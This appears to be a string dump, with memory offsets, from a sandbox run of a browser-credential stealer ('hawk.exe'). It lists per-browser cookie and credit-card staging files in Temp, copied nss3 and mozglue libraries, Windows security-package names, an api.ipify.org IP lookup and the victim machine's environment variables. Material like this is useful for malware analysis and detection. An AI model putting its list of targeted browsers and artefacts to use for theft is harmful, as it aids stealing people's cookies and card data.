- 0x36b8f8 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36bb20 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36bd48 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
- 0x36bf70 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c198 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c3c0 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c5e8 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x36c810 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36ca38 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36cc60 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36ce88 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x36d0b0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x36d2d8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x36d500 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36d728 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36d950 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36db78 (44): C:\Users\A\AppData\Local\Temp\Vivaldi_CC.txt
- 0x36dda0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36dfc8 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36e1f0 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36e418 (43): C:\Users\A\AppData\Local\Temp\Yandex_CC.txt
- 0x36e9ae (54): 9ppData\Local\Google\Chrome
- 0x36ed20 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x36ed88 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x36ee38 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x36ef28 (192): PATH=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x36fe06 (78): 8sers\A\AppData\Local\Temp\MSVCP140.dll
- 0x36fe56 (24): MSVCP140.dll
- 0x36fe70 (26): \MSVCP140.dll
- 0x36fef0 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x3707c0 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x3709e8 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x370c10 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x370e38 (43): C:\Users\A\AppData\Local\Temp\Kometa_CC.txt
- 0x371060 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x371288 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x3714b0 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x3716d8 (44): C:\Users\A\AppData\Local\Temp\Orbitum_CC.txt
- 0x371900 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x371b28 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x371d50 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x371f78 (43): C:\Users\A\AppData\Local\Temp\Comodo_CC.txt
- 0x3721a0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x3723c8 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x3725f0 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x372818 (42): C:\Users\A\AppData\Local\Temp\Torch_CC.txt
- 0x372a40 (42): C:\Users\A\AppData\Local\Temp\Opera_CC.txt
- 0x372c68 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x372e90 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x3730b8 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x3732e0 (43): C:\Users\A\AppData\Local\Temp\MailRu_CC.txt
- 0x373508 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373730 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373958 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373b80 (44): C:\Users\A\AppData\Local\Temp\rambler_CC.txt
- 0x373da8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x373fd0 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x3741f8 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x374420 (45): C:\Users\A\AppData\Local\Temp\Chromium_CC.txt
- 0x3747c0 (45): C:\Users\A\AppData\Local\Temp\Maxthon5_CC.txt
- 0x3749e8 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x374c10 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x374e38 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x375060 (44): C:\Users\A\AppData\Local\Temp\Sputnik_CC.txt
- 0x375288 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x3754b0 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x3756d8 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x375900 (41): C:\Users\A\AppData\Local\Temp\Epic_CC.txt
- 0x375b28 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x375d50 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x375f78 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x3761a0 (43): C:\Users\A\AppData\Local\Temp\CocCoc_CC.txt
- 0x3763c8 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x3765f0 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x376818 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x376a40 (43): C:\Users\A\AppData\Local\Temp\GOOGLE_CC.txt
- 0x376c68 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x376e90 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x3770b8 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x3772e0 (42): C:\Users\A\AppData\Local\Temp\Amigo_CC.txt
- 0x3774f4 (514): C:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x37a868 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x37a8a8 (82): C:\Users\A\AppData\Local\Temp\mozglue.dll
- 0x37cf14 (30): dows\system32\_
- 0x37d068 (7): WDigest
- 0x37d6a0 (11): cryptsp.dll
- 0x37d730 (12): NegoExtender
- 0x37d760 (9): Negotiate
- 0x37d778 (14): ncalrpc
- 0x37d790 (8): Kerberos
- 0x37d7c0 (8): Schannel
- 0x37d7d8 (14): WDigest
- 0x37d850 (14): CREDSSP
- 0x37da20 (22): DNSResolver
- 0x37da80 (16): epmapper
- 0x37daa0 (17): SystemFunction035
- 0x37dae0 (20): lsasspirpc
- 0x37db00 (20): lsasspirpc
- 0x37db20 (18): Negotiate
- 0x37db40 (16): Kerberos
- 0x37db60 (23): Microsoft Kerberos V1.0
- 0x37db80 (21): NTLM Security Package
- 0x37dba0 (16): Schannel
- 0x37dbc0 (22): PKU2U Security Package
- 0x37dc20 (20): rogin Data
- 0x37e570 (28): Microsoft Package Negotiator
- 0x37e8b8 (24): NegoExtender
- 0x37e8e0 (29): NegoExtender Security Package
- 0x37e908 (25): Schannel Security Package
- 0x37e958 (25): Schannel Security Package
- 0x37e9d0 (27): TS Service Security Package
- 0x37e9fa (18): DVAPI32.d
- 0x37f268 (88): Microsoft Unified Security Protocol Provider
- 0x37f6bc (26): api.ipify.org
- 0x37f7b8 (21): COMODO CA Limited1604
- 0x37f7d3 (47): -COMODO RSA Domain Validation Secure Server CA0
- 0x37f804 (14): 180124000000Z
- 0x37f813 (19): 210123235959Z0X1!0
- 0x37f82e (25): Domain Control Validated1
- 0x37f851 (21): PositiveSSL Wildcard1
- 0x37f870 (12): *.ipify.org0
- 0x37fa50 (30): https://secure.comodo.com/CPS0
- 0x37fa89 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
- 0x37faeb (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
- 0x37fb3d (26): http://ocsp.comodoca.com0!
- 0x37fb62 (11): *.ipify.org
- 0x37fb6e (12): ipify.org0
- 0x382fe8 (20): %pi.ipify.
- 0x383d0c (23): LRPC-710cd034e2444564be
- 0x385a30 (64): C:\Windows\SysWOW64\negoexts.DLL
- 0x385a80 (64): C:\Windows\SysWOW64\Kerberos.DLL
- 0x385ad0 (64): C:\Windows\SysWOW64\schannel.dll
- 0x385b20 (66): Digest Authentication for Windows
- 0x385b70 (62): C:\Windows\SysWOW64\wdigest.dll
- 0x385bc0 (70): Microsoft CredSSP Security Provider
- 0x385c10 (64): C:\Windows\SysWOW64\schannel.dll
- 0x385c80 (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x385cd0 (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x387384 (22): cryptsp.dll
- 0x38a51e (42): 8bcryptprimitives.dll
- 0x38a552 (7): dationY
- 0x38a7f1 (48): Chttp://crl.comodoca.com/COMODORSADomainValidatA
- 0x38a828 (80): C:\Windows\SysWOW64\bcryptprimitives.dll
- 0x38a87a (7): nValid;
- 0x38a8cc (9): ipify.org
- 0x38a8d6 (12): ipify.org0
- 0x38aa40 (19): Greater Manchester1
- 0x38aa5d (8): Salford1
- 0x38aa8c (34): OMODO RSA Certification Authority0
- 0x38aab0 (14): 140212000000Z
- 0x38aabf (15): 290211235959Z0
- 0x38ab05 (8): Salford1
- 0x38ab17 (21): COMODO CA Limited1604
- 0x38ab32 (26): -COMODO RSA Domain Validat
- 0x38ace8 (40): bcryptprimitives.dll
- 0x38ade0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x38aff8 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x38b178 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x38b4d4 (20): ncrypt.dll
- 0x38b9b0 (10): USERNAME=A
- 0x38c8a8 (14): =::=::\
- 0x38c8b8 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x38c8f6 (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x38c93c (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x38c9aa (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x38ca22 (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x38ca84 (28): COMPUTERNAME=O
- 0x38caa2 (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x38caea (38): FP_NO_HOST_CHECK=NO
- 0x38cb12 (24): HOMEDRIVE=C:
- 0x38cb2c (34): HOMEPATH=\Users\A
- 0x38cb50 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x38cb9c (30): LOGONSERVER=\\O
- 0x38cbbc (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x38cc48 (72): MpConfig_ProductCodeName=AntiSpyware
- 0x38cc92 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x38cd00 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x38cda8 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x38ce20 (44): NUMBER_OF_PROCESSORS=4
- 0x38ce4e (26): OS=Windows_NT
- 0x38ce6a (384): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x38cfec (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x38d068 (52): PROCESSOR_ARCHITECTURE=x86
- 0x38d09e (56): PROCESSOR_ARCHITEW6432=AMD64
- 0x38d0d8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x38d16a (34): PROCESSOR_LEVEL=6
- 0x38d18e (46): PROCESSOR_REVISION=9e09
- 0x38d1be (52): ProgramData=C:\ProgramData
- 0x38d1f4 (70): ProgramFiles=C:\Program Files (x86)
- 0x38d23c (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x38d28e (58): ProgramW6432=C:\Program Files
- 0x38d2ca (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x38d34c (44): PUBLIC=C:\Users\Public
- 0x38d37a (38): SESSIONNAME=Console
- 0x38d3a2 (28): SystemDrive=C:
- 0x38d3c0 (42): SystemRoot=C:\Windows
- 0x38d3ec (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x38d432 (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x38d476 (24): USERDOMAIN=O
- 0x38d490 (20): USERNAME=A
- 0x38d4a6 (44): USERPROFILE=C:\Users\A
- 0x38d4d4 (34): windir=C:\Windows
- 0x38d4f8 (46): windows_tracing_flags=3
- 0x38d528 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x38d5c8 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
- 0x38d61e (24): MSVCP140.dll
- 0x38d638 (26): \MSVCP140.dll
- 0x38d978 (62): Microsoft SSL Protocol Provider
- 0x38de0e (6): H+HU 9
- 0x38df26 (19): Greater Manchester1
- 0x38df43 (8): Salford1
- 0x38df55 (21): COMODO CA Limited1604
- 0x38df70 (47): -COMODO RSA Domain Validation Secure Server CA0
- 0x38dfa1 (14): 180124000000Z
- 0x38dfb0 (19): 210123235959Z0X1!0
- 0x38dfcb (25): Domain Control Validated1
- 0x38dfee (21): PositiveSSL Wildcard1
- 0x38e00d (12): *.ipify.org0
- 0x38e1ed (30): https://secure.comodo.com/CPS0
- 0x38e226 (69): Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
- 0x38e288 (70): Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$
- 0x38e2da (26): http://ocsp.comodoca.com0!
- 0x38e2ff (11): *.ipify.org
- 0x38e30b (12): ipify.org0
- 0x38e476 (19): Greater Manchester1
- 0x38e493 (8): Salford1
- 0x38e4a5 (21): COMODO CA Limited1+0)
- 0x38e4c0 (36): "COMODO RSA Certification Authority0
- 0x38e4e6 (14): 140212000000Z
- 0x38e4f5 (15): 290211235959Z0
- 0x38e51e (19): Greater Manchester1
- 0x38e53b (8): Salford1
- 0x38e54d (21): COMODO CA Limited1604
- 0x38e568 (47): -COMODO RSA Domain Validation Secure Server CA0
- 0x38e776 (62): ;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
- 0x38e7cf (50): /http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
- 0x38e80d (26): http://ocsp.comodoca.com0
- 0x38e8ca (6): f5s2`N
- 0x390b4c (32): tem32\bcrypt.dll
- 0x390ff0 (40): bcryptprimitives.dll
- 0x391028 (62): Microsoft SSL Protocol Provider
- 0x391120 (26): PROCESSOR_ARCHITECTURE=x86
- 0x391168 (21): SystemRoot=C:\Windows
- 0x391288 (23): PROCESSOR_REVISION=9e09
- 0x3912f8 (62): C:\Windows\system32\dbghelp.dll
- 0x391558 (22): PUBLIC=C:\Users\Public
- 0x3915a0 (26): ProgramData=C:\ProgramData
- 0x3915e8 (23): windows_tracing_flags=3
- 0x391630 (22): USERPROFILE=C:\Users\A
- 0x391870 (22): NUMBER_OF_PROCESSORS=4
- 0x394083 (6): +][!>G
- 0x3942ba (7): L#K~Dl
- 0x3970a8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3972c0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3974d8 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3976d6 (368): 6rogram Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\A\AppData\Local\Temp\
- 0x3978b0 (112): C:\Users\A\AppData\Local\Google\Chrome\USERDA~1\Default\
- 0x3ce298 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x3ce2f0 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x3ce348 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x3ce3a0 (38): C:\Users\A\AppData\Local\Temp\nss3.dll
- 0x3ce3d8 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
- 0x3ce430 (76): C:\Users\A\AppData\Local\Temp\nss3.dll
- 0x3cfa80 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x3cfd18 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x3cfd90 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x3cfe08 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x3d0d00 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x3d0f18 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x3d13e8 (6): zxGj`P
- 0x3d17d0 (40): C:\Users\A\AppData\Local\Temp\Yandex.txt
- 0x3d19e8 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d1c00 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d1e18 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d2030 (40): C:\Users\A\AppData\Local\Temp\Kometa.txt
- 0x3d2248 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x3d3b08 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x3d4550 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d4778 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d49a0 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d4bc8 (41): C:\Users\A\AppData\Local\Temp\Orbitum.txt
- 0x3d4df0 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5018 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5240 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5468 (40): C:\Users\A\AppData\Local\Temp\Comodo.txt
- 0x3d5690 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d58b8 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d5ae0 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d5d08 (39): C:\Users\A\AppData\Local\Temp\Torch.txt
- 0x3d5f30 (39): C:\Users\A\AppData\Local\Temp\Opera.txt
- 0x3d6158 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d6380 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d65a8 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d67d0 (40): C:\Users\A\AppData\Local\Temp\MailRu.txt
- 0x3d69f8 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d6c20 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d6e48 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d7070 (41): C:\Users\A\AppData\Local\Temp\rambler.txt
- 0x3d7298 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d74c0 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d76e8 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d7910 (42): C:\Users\A\AppData\Local\Temp\Chromium.txt
- 0x3d7b38 (42): C:\Users\A\AppData\Local\Temp\Maxthon5.txt
- 0x3d7d60 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d7f88 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d81b0 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d8550 (41): C:\Users\A\AppData\Local\Temp\Sputnik.txt
- 0x3d8778 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d89a0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d8bc8 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d8df0 (38): C:\Users\A\AppData\Local\Temp\Epic.txt
- 0x3d9018 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d9240 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d9468 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d9690 (40): C:\Users\A\AppData\Local\Temp\CocCoc.txt
- 0x3d98b8 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3d9ae0 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3d9d08 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3d9f30 (40): C:\Users\A\AppData\Local\Temp\GOOGLE.txt
- 0x3da158 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da380 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da5a8 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da7d0 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
- 0x3da9f8 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
- 0x3dac20 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
- 0x3dae48 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db070 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db298 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db4c0 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
- 0x3db6e8 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3db910 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3dbb38 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3dbd60 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
- 0x3dbf88 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc1b0 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc550 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc778 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
- 0x3dc9a0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dcbc8 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dcdf0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dd018 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
- 0x3dd240 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3dd468 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3dd690 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3dd8b8 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
- 0x3ddae0 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3ddd08 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3ddf30 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3de158 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
- 0x3de380 (47): C:\Users\A\AppData\Local\Temp\Opera_Cookies.txt
- 0x3de5a8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3de7d0 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3de9f8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3dec20 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
- 0x3dee48 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df070 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df298 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df4c0 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
- 0x3df6e8 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3df910 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3dfb38 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3dfd60 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
- 0x3dff88 (50): C:\Users\A\AppData\Local\Temp\Maxthon5_Cookies.txt
- 0x3e01b0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x3e051e (82): 8C:\Users\A\AppData\Local\Temp\result.txt
- 0x3e0572 (16): hawk.exe
- 0x460e80 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x460e9f (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x460ec2 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x460f08 (44): les(x86)=C:\Program Files (x86)\Common Files
- 0x460f35 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x460f66 (14): COMPUTERNAME=O
- 0x460f75 (11): ComSpec=C:\
- 0x460f99 (19): FP_NO_HOST_CHECK=NO
- 0x460fad (12): HOMEDRIVE=C:
- 0x460fba (17): HOMEPATH=\Users\A
- 0x460fcc (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x460ff2 (15): LOGONSERVER=\\O
- 0x461002 (6): MpConf
- 0x461018 (47): aPath=C:\ProgramData\Microsoft\Windows Defender
- 0x461048 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x46106d (35): MpConfig_ProductPath=C:\Program Fil
- 0x461107 (17): vngGUID=8C765C2A-
- 0x461128 (11): 2E8D7028CEB
- 0x461134 (22): NUMBER_OF_PROCESSORS=4
- 0x46114b (13): OS=Windows_NT
- 0x461159 (71): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Window
- 0x4611b0 (74): ndows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x4611fb (45): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JS
- 0x461239 (26): PROCESSOR_ARCHITECTURE=x86
- 0x461254 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x461271 (63): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, Gen
- 0x46134c (29): ProgramW6432=C:\Program Files
- 0x46136a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x4613ab (13): PUBLIC=C:\Use
- 0x4613c8 (13): NNAME=Console
- 0x4613d6 (14): SystemDrive=C:
- 0x4613e5 (21): SystemRoot=C:\Windows
- 0x4613fb (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x46141e (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x461450 (7): RNAME=A
- 0x461458 (22): USERPROFILE=C:\Users\A
- 0x46146f (17): windir=C:\Windows
- 0x461481 (23): windows_tracing_flags=3
- 0x461499 (47): windows_tracing_logfile=C:\BVTBin\Tests\install
- 0x4614d8 (6): le.log
- 0x461566 (26):
- 0x4615e4 (24):
- 0x4615fd (8):
- 0x461646 (26): abcdefghijklmnopqrstuvwxyz
- 0x461666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
- 0x4617c0 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x4617df (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x461802 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x461839 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x461875 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x4618a6 (14): COMPUTERNAME=O
- 0x4618b5 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x4618d9 (19): FP_NO_HOST_CHECK=NO
- 0x4618ed (12): HOMEDRIVE=C:
- 0x4618fa (17): HOMEPATH=\Users\A
- 0x46190c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x461932 (15): LOGONSERVER=\\O
